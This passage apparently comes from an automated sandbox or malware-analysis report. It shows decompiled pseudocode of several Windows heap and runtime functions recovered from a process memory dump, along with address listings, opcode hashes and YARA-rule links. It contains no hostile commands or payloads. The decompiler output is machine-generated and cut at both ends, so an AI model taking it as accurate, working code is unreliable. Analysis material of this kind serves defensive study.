								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E05372AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E05356600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E05372C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E0535EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E05372AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E05372C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E05372ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E0539D0D1(_t62);
				goto L28;
			}





















                                      0x05372990
                                      0x05372992
                                      0x05372997
                                      0x053729a3
                                      0x053729a6
                                      0x053729ab
                                      0x053729ad
                                      0x053729b2
                                      0x053b5c80
                                      0x053729b8
                                      0x053729b8
                                      0x053729bb
                                      0x053729c0
                                      0x053729c5
                                      0x053729c6
                                      0x053729c6
                                      0x053729cb
                                      0x00000000
                                      0x00000000
                                      0x053729cd
                                      0x053729d0
                                      0x053729d9
                                      0x053729db
                                      0x053729dd
                                      0x05372a7f
                                      0x05372a84
                                      0x05372a87
                                      0x05372a89
                                      0x053b5ca1
                                      0x053b5ca3
                                      0x00000000
                                      0x05372a8f
                                      0x05372a8f
                                      0x00000000
                                      0x05372a8f
                                      0x00000000
                                      0x053729e3
                                      0x053729e3
                                      0x053729e3
                                      0x00000000
                                      0x053729e3
                                      0x053729dd
                                      0x00000000
                                      0x053729db
                                      0x053729e6
                                      0x053729e9
                                      0x053729eb
                                      0x053729ed
                                      0x053729f3
                                      0x053729f5
                                      0x053729f8
                                      0x053729fa
                                      0x05372a97
                                      0x05372a9a
                                      0x05372a9d
                                      0x05372add
                                      0x00000000
                                      0x05372a9f
                                      0x05372aa2
                                      0x05372aa5
                                      0x05372aa8
                                      0x05372aab
                                      0x053b5cab
                                      0x053b5caf
                                      0x053b5cc5
                                      0x053b5cda
                                      0x053b5cdc
                                      0x053b5cdf
                                      0x053b5ce5
                                      0x00000000
                                      0x053b5ceb
                                      0x053b5ced
                                      0x053b5cee
                                      0x00000000
                                      0x053b5cee
                                      0x053b5cb1
                                      0x053b5cb4
                                      0x053b5cb9
                                      0x053b5cbb
                                      0x00000000
                                      0x053b5cbd
                                      0x053b5cbd
                                      0x00000000
                                      0x053b5cbd
                                      0x053b5cbb
                                      0x05372ab1
                                      0x05372ab1
                                      0x05372ac4
                                      0x05372ac6
                                      0x05372ac6
                                      0x00000000
                                      0x05372ac6
                                      0x05372aab
                                      0x00000000
                                      0x05372a00
                                      0x05372a09
                                      0x05372a0e
                                      0x05372a21
                                      0x05372a24
                                      0x05372a35
                                      0x05372a3a
                                      0x05372a3d
                                      0x05372a42
                                      0x05372a59
                                      0x05372a59
                                      0x05372a5c
                                      0x05372a5f
                                      0x05372a5f
                                      0x053729fa
                                      0x053729f3
                                      0x05372a64
                                      0x05372a64
                                      0x05372a6b
                                      0x05372a6b
                                      0x05372a6d
                                      0x05372a72
                                      0x00000000

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 213d23e3a335efbd0eb99dd692fcd3c8d7f542aa765181bec1310cea8f97c7c6
                                      • Instruction ID: 895fa2549c98b891971e604e78f91a59043ccdfa17d1951cbf60d93a1c26aff1
                                      • Opcode Fuzzy Hash: 213d23e3a335efbd0eb99dd692fcd3c8d7f542aa765181bec1310cea8f97c7c6
                                      • Instruction Fuzzy Hash: E2515575E00609DFDF25DF55C880AEEBBB6BF08310F148059F915AB260D7B99992CFA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 05374D3B, Relevance: .1, Instructions: 131COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 78%
                                      			E05374D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x543d360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E0538FA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x5437bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E0538B0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L053677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L05364620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E0534CCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L053677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E0538B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E0538F380(_t67 + 0xc, 0x5325138, 0x10) == 0) {
								 *0x54360d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E05374F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E05374E70(0x54386b0, 0x5375690, 0, 0) != 0) {
					_t46 = E0534CCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}




















                                      0x05374d3b
                                      0x05374d4d
                                      0x05374d53
                                      0x05374d58
                                      0x05374d65
                                      0x05374d6c
                                      0x05374d71
                                      0x05374d77
                                      0x05374d7f
                                      0x05374d8c
                                      0x05374d8e
                                      0x05374dad
                                      0x05374db0
                                      0x05374db7
                                      0x05374db8
                                      0x05374db9
                                      0x05374dba
                                      0x05374dbb
                                      0x05374dc1
                                      0x05374dc8
                                      0x05374dcc
                                      0x05374dd5
                                      0x05374dde
                                      0x05374ddf
                                      0x05374de0
                                      0x05374de1
                                      0x05374de6
                                      0x05374de7
                                      0x05374de9
                                      0x05374df3
                                      0x00000000
                                      0x00000000
                                      0x053b6c7c
                                      0x053b6c8a
                                      0x053b6c8a
                                      0x053b6c9d
                                      0x053b6ca7
                                      0x053b6cac
                                      0x053b6cb2
                                      0x053b6cb9
                                      0x00000000
                                      0x053b6cbf
                                      0x053b6cbf
                                      0x00000000
                                      0x053b6cbf
                                      0x053b6cb9
                                      0x05374dfb
                                      0x053b6ccf
                                      0x053b6cd3
                                      0x05374e32
                                      0x05374e39
                                      0x053b6ce0
                                      0x053b6cf2
                                      0x053b6cf2
                                      0x053b6ce0
                                      0x05374e3f
                                      0x05374e41
                                      0x05374e51
                                      0x05374e51
                                      0x05374e03
                                      0x05374e03
                                      0x05374e09
                                      0x05374e0f
                                      0x05374e57
                                      0x00000000
                                      0x00000000
                                      0x05374e1b
                                      0x05374e30
                                      0x05374e5b
                                      0x05374e5b
                                      0x00000000
                                      0x05374e30
                                      0x05374e11
                                      0x05374e11
                                      0x05374e16
                                      0x00000000
                                      0x05374e16
                                      0x05374e01
                                      0x00000000
                                      0x05374e01
                                      0x05374da5
                                      0x053b6c6b
                                      0x00000000
                                      0x05374dab
                                      0x05374dab
                                      0x00000000
                                      0x05374dab

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fc9dbf2ab5609a4bf9320f7fb5ec8c1d7d261258457072abfd736a7c5f33f52f
                                      • Instruction ID: c45f30b33dd825eafa5930644a266f7e845490e7aec521110b6d0660123e7bba
                                      • Opcode Fuzzy Hash: fc9dbf2ab5609a4bf9320f7fb5ec8c1d7d261258457072abfd736a7c5f33f52f
                                      • Instruction Fuzzy Hash: 0F418271B403189FEF35DF14CC85FBAB7AAEB45610F004099E94597681D7B8ED44CB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 05374BAD, Relevance: .1, Instructions: 131COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 85%
                                      			E05374BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x543d360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E0534CC50(_t86);
					L11:
					return E0538B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x5438504
				E05362280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E0538FA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E0538B0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L053677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L05364620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E0534CCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x5438504
								E0535FFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L053677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E05374F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}


























                                      0x05374bad
                                      0x05374bbf
                                      0x05374bc2
                                      0x05374bc6
                                      0x05374bcd
                                      0x05374bd9
                                      0x053b67fe
                                      0x053b6800
                                      0x05374ccc
                                      0x05374ccd
                                      0x05374cb7
                                      0x05374cc9
                                      0x05374cc9
                                      0x05374bdf
                                      0x05374be5
                                      0x00000000
                                      0x00000000
                                      0x05374beb
                                      0x05374bef
                                      0x00000000
                                      0x00000000
                                      0x05374bf5
                                      0x05374bf9
                                      0x05374c06
                                      0x05374c0b
                                      0x05374c17
                                      0x05374c1c
                                      0x05374c1f
                                      0x05374c25
                                      0x05374c33
                                      0x05374c3d
                                      0x05374c40
                                      0x05374c43
                                      0x05374c47
                                      0x05374c4d
                                      0x05374c53
                                      0x05374c54
                                      0x05374c55
                                      0x05374c56
                                      0x05374c5b
                                      0x05374c5c
                                      0x05374c63
                                      0x05374c6b
                                      0x00000000
                                      0x00000000
                                      0x053b6776
                                      0x053b6784
                                      0x053b6784
                                      0x053b679f
                                      0x053b67a7
                                      0x053b67af
                                      0x053b67ce
                                      0x00000000
                                      0x053b67b1
                                      0x053b67b7
                                      0x053b67b8
                                      0x053b67c1
                                      0x053b67d3
                                      0x053b67d9
                                      0x053b67dd
                                      0x05374c94
                                      0x05374c94
                                      0x05374c98
                                      0x05374c9c
                                      0x05374ca3
                                      0x053b67f4
                                      0x053b67f4
                                      0x05374cb5
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x05374cb5
                                      0x05374c79
                                      0x05374c7e
                                      0x05374c89
                                      0x05374c8b
                                      0x05374c8f
                                      0x05374c8f
                                      0x00000000
                                      0x05374c89
                                      0x053b67c3
                                      0x00000000
                                      0x053b67c3
                                      0x053b67af
                                      0x05374c73
                                      0x00000000
                                      0x00000000
                                      0x00000000

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d404cd798e4592cad27eb208ff4c14ea0aea042577aa07437de3aa3b7a483fcc
                                      • Instruction ID: 3732bc4c3828133be94668a7ac552147fb4480a256e8d17b1423aa83cc8fc138
                                      • Opcode Fuzzy Hash: d404cd798e4592cad27eb208ff4c14ea0aea042577aa07437de3aa3b7a483fcc
                                      • Instruction Fuzzy Hash: 2F419435E40229ABDF30DF64C945FEA77B9BF45710F0100A5E909AB641D7B8AE44CB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 05358A0A, Relevance: .1, Instructions: 120COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 94%
                                      			E05358A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x543d360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E0538B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E0535E9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x5321180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E05371DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E05383C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E05358999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L053677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}



























                                      0x05358a0a
                                      0x05358a1c
                                      0x05358a23
                                      0x05358a2e
                                      0x05358a30
                                      0x05358a36
                                      0x05358a3c
                                      0x05358a3e
                                      0x05358a4a
                                      0x05358a52
                                      0x05358a9c
                                      0x05358aae
                                      0x05358a58
                                      0x05358a5e
                                      0x05358a6a
                                      0x05358a6f
                                      0x05358a75
                                      0x05358a7d
                                      0x05358a85
                                      0x05358a86
                                      0x05358a89
                                      0x05358a93
                                      0x05358a99
                                      0x05358a9b
                                      0x00000000
                                      0x05358aaf
                                      0x05358abe
                                      0x05358ac3
                                      0x05358acb
                                      0x05358ad7
                                      0x05358ae0
                                      0x05358af1
                                      0x00000000
                                      0x05358af1
                                      0x05358acd
                                      0x05358ad5
                                      0x05358afb
                                      0x05358afd
                                      0x05358aff
                                      0x05358b07
                                      0x05358b22
                                      0x05358b24
                                      0x05358b2a
                                      0x05358b2e
                                      0x05358b3f
                                      0x05358b78
                                      0x05358b41
                                      0x05358b52
                                      0x05358b54
                                      0x05358b5c
                                      0x05358b74
                                      0x05358b74
                                      0x05358b5c
                                      0x05358b3f
                                      0x05358b5e
                                      0x05358b61
                                      0x05358b64
                                      0x05358b64
                                      0x05358b6c
                                      0x05358b6c
                                      0x05358b11
                                      0x053a9cd5
                                      0x053a9cd5
                                      0x05358b17
                                      0x05358b1a
                                      0x05358b1a
                                      0x00000000
                                      0x05358ad5
                                      0x05358a89

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f010cb5cfab624d9b1ae32cc5f5189dbf3d10947278a824d45640578e94f2850
                                      • Instruction ID: 10657b111cc289d5a1d6bb1552d5d0ab32d6e3f3776aa7afd72821e99e9a439c
                                      • Opcode Fuzzy Hash: f010cb5cfab624d9b1ae32cc5f5189dbf3d10947278a824d45640578e94f2850
                                      • Instruction Fuzzy Hash: 08415DB5A012289BDB24DF15C888EBAB7B9FB44310F2055EADC1997251EB709E81CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0540AA16, Relevance: .1, Instructions: 120COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0540AA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				intOrPtr _v24;
				char* _t37;
				void* _t47;
				signed char _t51;
				void* _t53;
				char _t55;
				intOrPtr _t57;
				signed char _t61;
				intOrPtr _t75;
				void* _t76;
				signed int _t81;
				intOrPtr _t82;

				_t53 = __ecx;
				_t55 = 0;
				_v20 = _v20 & 0;
				_t75 = __edx;
				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
				_v24 = __edx;
				_v12 = 0;
				if((_t81 & 0x01000000) != 0) {
					L5:
					if(_a8 != 0) {
						_t81 = _t81 | 0x00000008;
					}
					_t57 = E0540ABF4(_t55 + _t75, _t81);
					_v8 = _t57;
					if(_t57 < _t75 || _t75 > 0x7fffffff) {
						_t76 = 0;
						_v16 = _v16 & 0;
					} else {
						_t59 = _t53;
						_t76 = E0540AB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
							_t47 = E0540AC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
							_t61 = _v20;
							if(_t61 != 0) {
								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
								if(E053ECB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
									L053677F0(_t53, 0, _t76);
									_t76 = 0;
								}
							}
						}
					}
					_t82 = _v8;
					L16:
					if(E05367D50() == 0) {
						_t37 = 0x7ffe0380;
					} else {
						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0540131B(_t53, _t76, _t82, _v16);
					}
					return _t76;
				}
				_t51 =  *(__ecx + 0x20);
				_v20 = _t51;
				if(_t51 == 0) {
					goto L5;
				}
				_t81 = _t81 | 0x00000008;
				if(E053ECB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
					_t55 = _v12;
					goto L5;
				} else {
					_t82 = 0;
					_t76 = 0;
					_v16 = _v16 & 0;
					goto L16;
				}
			}



















                                      0x0540aa1f
                                      0x0540aa21
                                      0x0540aa23
                                      0x0540aa2b
                                      0x0540aa30
                                      0x0540aa36
                                      0x0540aa39
                                      0x0540aa42
                                      0x0540aa75
                                      0x0540aa7a
                                      0x0540aa7c
                                      0x0540aa7c
                                      0x0540aa88
                                      0x0540aa8a
                                      0x0540aa8f
                                      0x0540ab02
                                      0x0540ab04
                                      0x0540aa99
                                      0x0540aaa8
                                      0x0540aaaf
                                      0x0540aab3
                                      0x0540aacc
                                      0x0540aad1
                                      0x0540aad6
                                      0x0540aae0
                                      0x0540aaf3
                                      0x0540aaf9
                                      0x0540aafe
                                      0x0540aafe
                                      0x0540aaf3
                                      0x0540aad6
                                      0x0540aab3
                                      0x0540ab07
                                      0x0540ab0a
                                      0x0540ab11
                                      0x0540ab23
                                      0x0540ab13
                                      0x0540ab1c
                                      0x0540ab1c
                                      0x0540ab2b
                                      0x0540ab44
                                      0x0540ab44
                                      0x0540ab51
                                      0x0540ab51
                                      0x0540aa44
                                      0x0540aa47
                                      0x0540aa4c
                                      0x00000000
                                      0x00000000
                                      0x0540aa5a
                                      0x0540aa64
                                      0x0540aa72
                                      0x00000000
                                      0x0540aa66
                                      0x0540aa66
                                      0x0540aa68
                                      0x0540aa6a
                                      0x00000000
                                      0x0540aa6a

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                      • Instruction ID: 5b6cd3d23e5cbd0b0294356de33adf36d13c61a9ea040a56b8abcf6e8882b8d7
                                      • Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                      • Instruction Fuzzy Hash: C931CF32B002146BDB15EA66CC49FEFF7BAEB80210F2590BAE905A73D1DA749D00C650
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0540FDE2, Relevance: .1, Instructions: 116COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 76%
                                      			E0540FDE2(signed int* __ecx, signed int __edx, signed int _a4) {
				char _v8;
				signed int _v12;
				signed int _t29;
				char* _t32;
				char* _t43;
				signed int _t80;
				signed int* _t84;

				_push(__ecx);
				_push(__ecx);
				_t56 = __edx;
				_t84 = __ecx;
				_t80 = E0540FD4E(__ecx, __edx);
				_v12 = _t80;
				if(_t80 != 0) {
					_t29 =  *__ecx & _t80;
					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
						E05410A13(__ecx, _t80, 0, _a4);
						_t80 = 1;
						if(E05367D50() == 0) {
							_t32 = 0x7ffe0380;
						} else {
							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							_push(3);
							L21:
							E05401608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
						}
						goto L22;
					}
					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
						_t80 = E05412B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
						if(_t80 != 0) {
							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
							_t77 = _v8;
							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
								E0540C8F7(_t66, _t77, 0);
							}
						}
					} else {
						_t80 = E0540DBD2(__ecx[0xb], _t74, __edx, _a4);
					}
					if(E05367D50() == 0) {
						_t43 = 0x7ffe0380;
					} else {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
						goto L22;
					} else {
						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
						goto L21;
					}
				} else {
					_push(__ecx);
					_push(_t80);
					E0540A80D(__ecx[0xf], 9, __edx, _t80);
					L22:
					return _t80;
				}
			}










                                      0x0540fde7
                                      0x0540fde8
                                      0x0540fdec
                                      0x0540fdee
                                      0x0540fdf5
                                      0x0540fdf7
                                      0x0540fdfc
                                      0x0540fe19
                                      0x0540fe22
                                      0x0540fe26
                                      0x0540fec6
                                      0x0540fecd
                                      0x0540fed5
